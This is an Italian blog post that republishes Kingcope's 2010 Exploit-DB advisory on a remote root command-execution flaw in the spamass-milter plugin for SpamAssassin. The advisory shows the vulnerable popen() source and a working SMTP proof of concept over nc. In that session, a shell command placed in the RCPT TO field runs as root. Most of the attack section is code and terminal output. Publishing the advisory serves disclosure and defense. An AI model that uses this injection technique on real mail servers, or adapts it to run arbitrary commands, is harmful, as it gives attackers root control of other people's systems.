SpamAssasin è in assoluto il metodo antispam più sfruttato dalle Web Farm mondiali in quanto si integra perfettamente con Apache ed è OpenSource.

Oggi Exploit-Db pubblica una vulnerabilità scoperta da Kingcope che permette l'esecuzione remota di codice malevolo ad insaputa dell'amministratore del sistema.

L’exploit è sfruttabile esclusivamente se è installato anche il Plugin: Spamassassin Milter che permette una personalizzazione avanzata dei filtri basi di SpamAssasin.

Il codice malevolo permette l’esecuzione di qualsiasi comando come utente root e dovrò essere inserito all’interno del campo “RCPT TO”, ovvero nel campo composto solitamente dall’indirizzo e.mail del destinatario.

 

Ecco infine l’exploit dettagliato:

# Title: Apache Spamassassin Milter Plugin Remote Root Command Execution
# EDB-ID: 11662
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Kingcope
# Published: 2010-03-09
# Verified: yes
# Download Exploit Code
# Download N/A

view source
print?
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author: Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
 struct context *sctx = (struct context*)smfi_getpriv(ctx);
 SpamAssassin* assassin = sctx->assassin;
 FILE *p;
#if defined(__FreeBSD__)
 int rv;
#endif

 debug(D_FUNC, "mlfi_envrcpt: enter");

 if (flag_expand)
 {
 /* open a pipe to sendmail so we can do address
expansion */

 char buf[1024];
 char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
 snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
 /* XXX possible buffer overflow here // is this a
joke ?! */
 sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

 debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
 rv = pthread_mutex_lock(&popen_mutex);
 if (rv)
 {
 debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
 abort();
 }
#endif

 p = popen(buf, "r");                [1]
 if (!p)
 {
 debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));
 assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope
Did you like this?
Tip Andrea Draghetti with Cryptocurrency

Donate Bitcoin to Andrea Draghetti

Scan to Donate Bitcoin to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some bitcoin:

Donate Bitcoin Cash to Andrea Draghetti

Scan to Donate Bitcoin Cash to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send bitcoin:

Donate Ethereum to Andrea Draghetti

Scan to Donate Ethereum to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some Ether:

Donate Litecoin to Andrea Draghetti

Scan to Donate Litecoin to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some Litecoin:

Donate Monero to Andrea Draghetti

Scan to Donate Monero to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some Monero:

Donate ZCash to Andrea Draghetti

Scan to Donate ZCash to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some ZCash: